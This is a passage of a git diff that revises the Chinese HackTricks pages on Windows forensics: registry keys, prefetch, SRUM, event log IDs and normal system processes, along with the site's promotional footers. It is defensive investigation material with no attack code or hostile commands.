[**注册表浏览器**](https://ericzimmerman.github.io/#!index.md):允许加载注册表文件并通过GUI浏览它们。还包含突出显示具有有趣信息的键的书签。 -* [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样,它有一个GUI,允许浏览加载的注册表,并包含突出显示加载的注册表中有趣信息的插件。 +* [**注册表浏览器**](https://ericzimmerman.github.io/#!index.md):允许加载注册表文件并通过GUI浏览。还包含突出显示具有有趣信息的键的书签。 +* [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样具有GUI,可浏览加载的注册表,并包含突出显示加载的注册表中有趣信息的插件。 * [**Windows注册表恢复**](https://www.mitec.cz/wrr.html):另一个能够提取注册表中重要信息的GUI应用程序。 ### 恢复已删除元素 -当键被删除时,会标记为已删除,但直到需要占用的空间时才会被删除。因此,使用诸如**注册表浏览器**之类的工具可以恢复这些已删除的键。 +删除键时会标记为已删除,但在需要占用其空间之前不会被删除。因此,使用诸如**注册表浏览器**之类的工具可以恢复这些已删除的键。 ### 最后写入时间 @@ -272,9 +273,9 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文 ### SAM -文件/注册表**SAM**包含系统的**用户、组和用户密码**哈希。 +文件/数据库**SAM**包含系统的**用户、组和用户密码**哈希。 -在`SAM\Domains\Account\Users`中,您可以获取用户名、RID、上次登录、上次登录失败、登录计数器、密码策略以及帐户创建时间。要获取**哈希值**,还需要文件/注册表**SYSTEM**。 +在`SAM\Domains\Account\Users`中,您可以获取用户名、RID、上次登录、上次登录失败、登录计数器、密码策略以及帐户创建时间。要获取**哈希值**,还需要文件/数据库**SYSTEM**。 ### Windows注册表中的有趣条目 @@ -288,23 +289,23 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文 在[此文章](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d)中,您可以了解常见的Windows进程,以便检测可疑行为。 -### Windows最近的应用程序 +### Windows最近使用的应用程序 在注册表`NTUSER.DAT`的路径`Software\Microsoft\Current Version\Search\RecentApps`中,您可以找到有关**执行的应用程序**、**上次执行时间**以及**启动次数**的信息。 ### BAM(后台活动调节器) -您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中,您可以找到有关每个用户执行的**应用程序**的信息(注意路径中的`{SID}`),以及它们执行的**时间**(时间在注册表的数据值中)。 +您可以使用注册表编辑器打开`SYSTEM`文件,在路径`SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`中,您可以找到有关每个用户执行的**应用程序**的信息(注意路径中的`{SID}`),以及它们执行的**时间**(时间位于注册表的数据值中)。 ### Windows预取 预取是一种技术,允许计算机默默地**获取显示内容所需的资源**,用户**可能在不久的将来访问**,以便更快地访问资源。 -Windows预取包括创建**已执行程序的缓存**,以便更快地加载它们。这些缓存以`.pf`文件的形式创建在路径:`C:\Windows\Prefetch`。在XP/VISTA/WIN7中限制为128个文件,在Win8/Win10中为1024个文件。 +Windows预取包括创建**已执行程序的缓存**,以便更快地加载它们。这些缓存以`.pf`文件的形式创建在路径:`C:\Windows\Prefetch`中。在XP/VISTA/WIN7中限制为128个文件,在Win8/Win10中为1024个文件。 文件名创建为`{program_name}-{hash}.pf`(哈希基于可执行文件的路径和参数)。在W10中,这些文件是压缩的。请注意,文件的存在仅表示**该程序曾被执行**。 -文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件夹的名称**。该文件包含有关执行次数的信息,执行的**日期**以及程序打开的**文件**。 +文件`C:\Windows\Prefetch\Layout.ini`包含**预取文件夹的名称**。该文件包含有关执行次数的信息,执行日期以及程序**打开的文件**。 要检查这些文件,可以使用工具[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): ```bash @@ -314,30 +315,30 @@ Windows预取包括创建**已执行程序的缓存**,以便更快地加载它 ### Superprefetch -**Superprefetch**的目标与prefetch相同,通过预测下一个加载的内容来**加快程序加载速度**。但是,它并不取代prefetch服务。\ -该服务会在`C:\Windows\Prefetch\Ag*.db`中生成数据库文件。 +**Superprefetch** 的目标与 prefetch 相同,通过预测下一个加载的内容来**更快地加载程序**。但是,它并不取代 prefetch 服务。\ +该服务会在 `C:\Windows\Prefetch\Ag*.db` 中生成数据库文件。 在这些数据库中,您可以找到**程序的名称**、**执行次数**、**打开的文件**、**访问的卷**、**完整路径**、**时间范围**和**时间戳**。 -您可以使用工具[**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/)访问这些信息。 +您可以使用工具 [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) 访问这些信息。 ### SRUM -**系统资源使用监视器**(SRUM)**监视**进程**消耗的资源**。它出现在W8中,并将数据存储在位于`C:\Windows\System32\sru\SRUDB.dat`的ESE数据库中。 +**系统资源使用监视器**(SRUM)**监视**进程**消耗的资源**。它出现在 W8 中,并将数据存储在位于 `C:\Windows\System32\sru\SRUDB.dat` 中的 ESE 数据库中。 它提供以下信息: -* 应用程序ID和路径 +* 应用程序 ID 和路径 * 执行该进程的用户 -* 发送字节数 -* 接收字节数 +* 发送字节 +* 接收字节 * 网络接口 * 连接持续时间 * 进程持续时间 -此信息每60分钟更新一次。 +此信息每 60 分钟更新一次。 -您可以使用工具[**srum\_dump**](https://github.com/MarkBaggett/srum-dump)从此文件中获取日期。 +您可以使用工具 [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) 从此文件中获取日期。 ```bash .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum ``` @@ -391,7 +392,7 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ### **Windows商店** 安装的应用程序可以在`\ProgramData\Microsoft\Windows\AppRepository\`中找到。\ -此存储库中有一个**日志**,其中包含系统中安装的**每个应用程序**的信息,存储在数据库**`StateRepository-Machine.srd`**中。 +此存储库中有一个**日志**,其中包含系统中安装的**每个应用程序**的信息,存储在名为**`StateRepository-Machine.srd`**的数据库中。 在此数据库的Application表中,可以找到列:"Application ID"、"PackageNumber"和"Display Name"。这些列包含有关预安装和已安装应用程序的信息,可以查看某些应用程序是否已被卸载,因为已安装应用程序的ID应该是连续的。 @@ -408,9 +409,9 @@ Windows事件中显示的信息包括: * 涉及的主机(主机名,IP) * 访问的资产(文件,文件夹,打印机,服务) -日志位于Windows Vista之前的`C:\Windows\System32\config`中,在Windows Vista之后位于`C:\Windows\System32\winevt\Logs`中。在Windows Vista之前,事件日志以二进制格式存储,在Windows Vista之后,它们以**XML格式**存储,并使用**.evtx**扩展名。 +日志位于Windows Vista之前的`C:\Windows\System32\config`中,之后位于`C:\Windows\System32\winevt\Logs`中。在Windows Vista之前,事件日志以二进制格式存储,之后以**XML格式**存储,并使用**.evtx**扩展名。 -事件文件的位置可以在SYSTEM注册表中的**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**中找到 +事件文件的位置可以在SYSTEM注册表中的**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**中找到。 可以使用Windows事件查看器(**`eventvwr.msc`**)或其他工具如[**Event Log Explorer**](https://eventlogxp.com) **或** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**来可视化这些事件。** @@ -429,7 +430,7 @@ Windows事件中显示的信息包括: - **Interactive (2)**:直接用户登录。 - **Network (3)**:访问共享文件夹。 -- **Batch (4)**:批处理进程的执行。 +- **Batch (4)**:执行批处理过程。 - **Service (5)**:服务启动。 - **Proxy (6)**:代理身份验证。 - **Unlock (7)**:使用密码解锁屏幕。 @@ -446,18 +447,18 @@ Windows事件中显示的信息包括: - **0xC000006A**:正确的用户名但密码错误 - 可能是密码猜测或暴力破解尝试。 - **0xC0000234**:用户帐户被锁定 - 可能是多次登录失败导致的暴力破解攻击。 - **0xC0000072**:帐户已禁用 - 未经授权的尝试访问已禁用的帐户。 -- **0xC000006F**:在允许的时间之外登录 - 表示尝试在设置的登录时间之外访问,可能是未经授权访问的迹象。 +- **0xC000006F**:在允许的时间外登录 - 表示尝试在设置的登录时间之外访问,可能是未经授权访问的迹象。 - **0xC0000070**:违反工作站限制 - 可能是尝试从未经授权的位置登录。 - **0xC0000193**:帐户过期 - 使用已过期用户帐户的访问尝试。 -- **0xC0000071**:密码已过期 - 使用过时密码的登录尝试。 +- **0xC0000071**:密码过期 - 使用过时密码的登录尝试。 - **0xC0000133**:时间同步问题 - 客户端和服务器之间存在较大的时间差异,可能表明更复杂的攻击,如票据传递攻击。 -- **0xC0000224**:需要强制更改密码 - 频繁的强制更改可能表明试图破坏帐户安全性。 +- **0xC0000224**:需要强制更改密码 - 频繁强制更改可能表明试图破坏帐户安全性。 - **0xC0000225**:表示系统错误而不是安全问题。 - **0xC000015b**:拒绝的登录类型 - 使用未经授权的登录类型进行访问尝试,例如用户尝试执行服务登录。 #### EventID 4616: -- **时间更改**:修改系统时间,可能混淆事件时间轴。 +- **时间更改**:修改系统时间,可能掩盖事件时间线。 #### EventID 6005和6006: @@ -467,15 +468,15 @@ Windows事件中显示的信息包括: - **日志删除**:清除安全日志,通常是掩盖非法活动的红旗。 -#### 用于USB设备跟踪的EventID: +#### 用于USB设备跟踪的事件ID: - **20001 / 20003 / 10000**:USB设备首次连接。 - **10100**:USB驱动程序更新。 - **EventID 112**:USB设备插入时间。 -要了解有关模拟这些登录类型和凭据转储机会的实际示例,请参阅[Altered Security的详细指南](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)。 +有关模拟这些登录类型和凭据转储机会的实际示例,请参阅[Altered Security的详细指南](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)。 -事件详细信息,包括状态和子状态代码,可进一步了解事件原因,特别是在Event ID 4625中。 +事件详细信息,包括状态和子状态代码,可进一步了解事件原因,特别是在事件ID 4625中。 ### 恢复Windows事件 @@ -483,7 +484,7 @@ Windows事件中显示的信息包括: ### 通过Windows事件识别常见攻击 -要全面了解如何使用Windows事件ID识别常见网络攻击,请访问[Red Team Recipe](https://redteamrecipe.com/event-codes/)。 +有关使用Windows事件ID识别常见网络攻击的全面指南,请访问[Red Team Recipe](https://redteamrecipe.com/event-codes/)。 #### 暴力破解攻击 @@ -495,30 +496,31 @@ Windows事件中显示的信息包括: #### USB设备跟踪 -用于USB设备跟踪的有用的系统EventID包括用于初始使用的20001/20003/10000,用于驱动程序更新的10100,以及来自DeviceSetupManager的插入时间戳的EventID 112。 +用于USB设备跟踪的有用的系统事件ID包括用于初始使用的20001/20003/10000,用于驱动程序更新的10100,以及来自DeviceSetupManager的插入时间戳的EventID 112。 #### 系统电源事件 EventID 6005 表示系统启动,而 EventID 6006 表示关机。 #### 日志删除 -安全事件 EventID 1102 表示日志删除,这是进行取证分析的关键事件。 +安全事件ID 1102 表示日志删除,这是进行取证分析的关键事件。
{% embed url="https://websec.nl/" %} +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index a57966738..ad0703b7b 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### 有趣的Windows注册表键 +{% hint style="success" %} +学习和实践AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
- +{% endhint %} ### **Windows版本和所有者信息** - 位于**`Software\Microsoft\Windows NT\CurrentVersion`**,您将找到Windows版本、服务包、安装时间以及注册所有者的名称。 @@ -31,44 +31,44 @@ `fsutil behavior set disablelastaccess 0` ### Windows版本和服务包 -- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复和有时新功能的更新。 +- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复程序和有时新功能的更新。 ### 启用最后访问时间 - 启用最后访问时间跟踪允许您查看文件上次打开的时间,这对于取证分析或系统监控至关重要。 ### 网络信息详细信息 -- 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于了解网络安全设置和权限至关重要。 +- 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于理解网络安全设置和权限至关重要。 ### 客户端端缓存(CSC) -- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制着如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。 +- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。 ### 自启动程序 - 在各种`Run`和`RunOnce`注册表键中列出的程序会在启动时自动运行,影响系统启动时间,并有可能成为识别恶意软件或不需要的软件的关注点。 ### Shellbags -- **Shellbags**不仅存储文件夹视图的偏好设置,还提供了对文件夹访问的取证证据,即使文件夹已经不存在。它们对于调查非常宝贵,揭示了通过其他方式不明显的用户活动。 +- **Shellbags**不仅存储文件夹视图的偏好设置,还提供了即使文件夹不存在也能提供文件夹访问的取证证据。它们对于调查非常宝贵,揭示了通过其他方式不明显的用户活动。 ### USB信息和取证 - 注册表中存储的有关USB设备的详细信息可以帮助跟踪连接到计算机的设备,可能将设备与敏感文件传输或未经授权访问事件联系起来。 ### 卷序列号 -- **卷序列号**对于跟踪特定文件系统实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。 +- **卷序列号**对于跟踪文件系统的特定实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。 ### **关机详细信息** - 关机时间和计数(仅适用于XP)保存在**`System\ControlSet001\Control\Windows`**和**`System\ControlSet001\Control\Watchdog\Display`**中。 ### **网络配置** - 有关详细网络接口信息,请参考**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。 -- 首次和最后一次网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。 +- 首次和最后的网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。 ### **共享文件夹** -- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定了离线文件的可用性。 +- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定离线文件的可用性。 ### **自动启动的程序** - 类似**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**和`Software\Microsoft\Windows\CurrentVersion`下的条目详细说明了设置为在启动时运行的程序。 ### **搜索和键入路径** -- 在注册表中,**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下跟踪了资源管理器搜索和键入的路径,分别为WordwheelQuery和TypedPaths。 +- 在注册表中跟踪的资源管理器搜索和键入的路径分别位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下的WordwheelQuery和TypedPaths。 ### **最近文档和Office文件** - 访问的最近文档和Office文件记录在`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`和特定Office版本路径中。 @@ -77,29 +77,30 @@ - MRU列表,指示最近的文件路径和命令,存储在`NTUSER.DAT`的各个`ComDlg32`和`Explorer`子键中。 ### **用户活动跟踪** -- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和最后运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。 +- 用户助手功能记录详细的应用程序使用统计信息,包括运行次数和上次运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。 ### **Shellbags分析** -- 存储着文件夹访问详细信息的Shellbags存储在`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。 +- 存储文件夹访问详细信息的Shellbags位于`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。 ### **USB设备历史** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**和**`HKLM\SYSTEM\ControlSet001\Enum\USB`**包含有关连接的USB设备的丰富详细信息,包括制造商、产品名称和连接时间戳。 - 可通过搜索`NTUSER.DAT`中的设备的**{GUID}**来确定与特定USB设备关联的用户。 -- 可通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`分别追踪最后安装的设备及其卷序列号。 +- 最后安装的设备及其卷序列号可以通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`追踪。 本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易用。 +{% hint style="success" %} +学习和实践AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index 60e60effb..abf18047e 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,88 +1,89 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 **HackTricks** 和 **HackTricks Cloud** 的 github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## smss.exe **会话管理器**。\ -会话0启动**csrss.exe**和**wininit.exe**(**操作系统服务**),而会话1启动**csrss.exe**和**winlogon.exe**(**用户会话**)。但是,您应该在进程树中看到**只有一个该二进制文件的进程**,没有子进程。 +会话 0 启动 **csrss.exe** 和 **wininit.exe**(**操作系统服务**),而会话 1 启动 **csrss.exe** 和 **winlogon.exe**(**用户会话**)。但是,您应该在进程树中看到该**二进制文件的一个进程**,没有子进程。 -此外,除了0和1之外的会话可能意味着正在发生RDP会话。 +此外,除了 0 和 1 会话外,可能表示正在发生 RDP 会话。 ## csrss.exe **客户端/服务器运行子系统进程**。\ -它管理**进程**和**线程**,使**Windows API**可用于其他进程,还**映射驱动器**,创建**临时文件**,处理**关机过程**。 +它管理**进程**和**线程**,使**Windows API**可用于其他进程,还**映射驱动器号**,创建**临时文件**,处理**关机过程**。 -在会话0中有一个,在会话1中有另一个(因此在进程树中有**2个进程**)。每个新会话都会创建另一个。 +在会话 0 中有一个,会话 1 中有另一个(因此在进程树中有**2个进程**)。每个新会话都会创建另一个。 ## winlogon.exe -**Windows登录进程**。\ -它负责用户**登录**/**注销**。它启动**logonui.exe**以请求用户名和密码,然后调用**lsass.exe**来验证它们。 +**Windows 登录进程**。\ +负责用户**登录**/**注销**。它启动 **logonui.exe** 以请求用户名和密码,然后调用 **lsass.exe** 进行验证。 -然后它启动在**`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`**中指定的**userinit.exe**,键为**Userinit**。 +然后启动指定在 **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** 中的 **Userinit** 键的 **userinit.exe**。 -此外,前面的注册表中应该在**Shell键**中有**explorer.exe**,否则可能被滥用为**恶意软件持久性方法**。 +此外,前面的注册表中应该在 **Shell 键** 中有 **explorer.exe**,否则可能被滥用为**恶意软件持久性方法**。 ## wininit.exe -**Windows初始化进程**。\ -在会话0中启动**services.exe**,**lsass.exe**和**lsm.exe**。应该只有1个进程。 +**Windows 初始化进程**。\ +在会话 0 中启动 **services.exe**、**lsass.exe** 和 **lsm.exe**。应该只有 1 个进程。 ## userinit.exe -**用户登录应用程序**。\ -加载**HKCU**中的**ntduser.dat**,初始化**用户环境**,运行**登录脚本**和**GPO**。 +**Userinit 登录应用程序**。\ +加载 **HKCU** 中的 **ntduser.dat** 并初始化**用户环境**,运行**登录脚本**和**GPO**。 -它启动**explorer.exe**。 +它启动 **explorer.exe**。 ## lsm.exe **本地会话管理器**。\ -它与smss.exe一起操作用户会话:登录/注销,启动shell,锁定/解锁桌面等。 +它与 smss.exe 一起操作用户会话:登录/注销、启动 shell、锁定/解锁桌面等。 -在W7之后,lsm.exe被转换为一个服务(lsm.dll)。 +在 W7 之后,lsm.exe 被转换为一个服务(lsm.dll)。 -在W7中应该只有1个进程,其中一个服务运行该DLL。 +在 W7 中应该只有 1 个进程,其中一个服务运行 DLL。 ## services.exe **服务控制管理器**。\ -它**加载**配置为**自动启动**的**服务**和**驱动程序**。 +**加载**配置为**自动启动**的**服务**和**驱动程序**。 -它是**svchost.exe**,**dllhost.exe**,**taskhost.exe**,**spoolsv.exe**等的父进程。 +它是 **svchost.exe**、**dllhost.exe**、**taskhost.exe**、**spoolsv.exe** 等的父进程。 -服务在`HKLM\SYSTEM\CurrentControlSet\Services`中定义,此进程在内存中维护服务信息的数据库,可以通过sc.exe查询。 +服务在 `HKLM\SYSTEM\CurrentControlSet\Services` 中定义,此进程在内存中维护服务信息的数据库,可以通过 sc.exe 查询。 -请注意,**一些** **服务**将在**自己的进程中运行**,而其他服务将在**共享的svchost.exe进程中运行**。 +请注意,**一些** **服务**将在**自己的进程中运行**,而其他服务将**共享 svchost.exe 进程**。 -应该只有1个进程。 +应该只有 1 个进程。 ## lsass.exe **本地安全机构子系统**。\ -它负责用户**身份验证**和创建**安全** **令牌**。它使用位于`HKLM\System\CurrentControlSet\Control\Lsa`中的身份验证包。 +负责用户**身份验证**和创建**安全令牌**。它使用位于 `HKLM\System\CurrentControlSet\Control\Lsa` 中的身份验证包。 -它写入**安全** **事件** **日志**,应该只有1个进程。 +它写入**安全** **事件** **日志**,应该只有 1 个进程。 请记住,这个进程经常受到攻击以转储密码。 @@ -90,53 +91,55 @@ ## svchost.exe **通用服务主机进程**。\ -它在一个共享进程中托管多个DLL服务。 +在一个共享进程中托管多个 DLL 服务。 -通常,您会发现**svchost.exe**是使用`-k`标志启动的。这将启动对注册表**HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**的查询,其中将包含一个带有-k参数的键,其中包含要在同一进程中启动的服务。 +通常,您会发现 **svchost.exe** 是带有 `-k` 标志启动的。这将启动对注册表 **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** 的查询,其中将包含带有 `-k` 中提到的参数的键,该键将包含要在同一进程中启动的服务。 -例如:`-k UnistackSvcGroup`将启动:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` +例如:`-k UnistackSvcGroup` 将启动:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -如果还使用了**`-s`标志**并带有参数,则要求svchost仅在此参数中启动指定的服务。 +如果还使用了 **`-s` 标志** 并带有参数,则要求 svchost 仅启动此参数中指定的服务。 -将会有几个`svchost.exe`进程。如果其中任何一个**没有使用`-k`标志**,那就非常可疑。如果发现**services.exe不是父进程**,那也非常可疑。 +将会有几个 `svchost.exe` 进程。如果其中任何一个**没有使用 `-k` 标志**,那就非常可疑。如果发现**services.exe 不是父进程**,那也非常可疑。 ## taskhost.exe -此进程充当运行自DLL的进程的主机。它还加载从DLL运行的服务。 +此进程充当从 DLL 运行的进程的主机。它还加载从 DLL 运行的服务。 -在W8中称为taskhostex.exe,在W10中称为taskhostw.exe。 +在 W8 中称为 taskhostex.exe,在 W10 中称为 taskhostw.exe。 ## explorer.exe 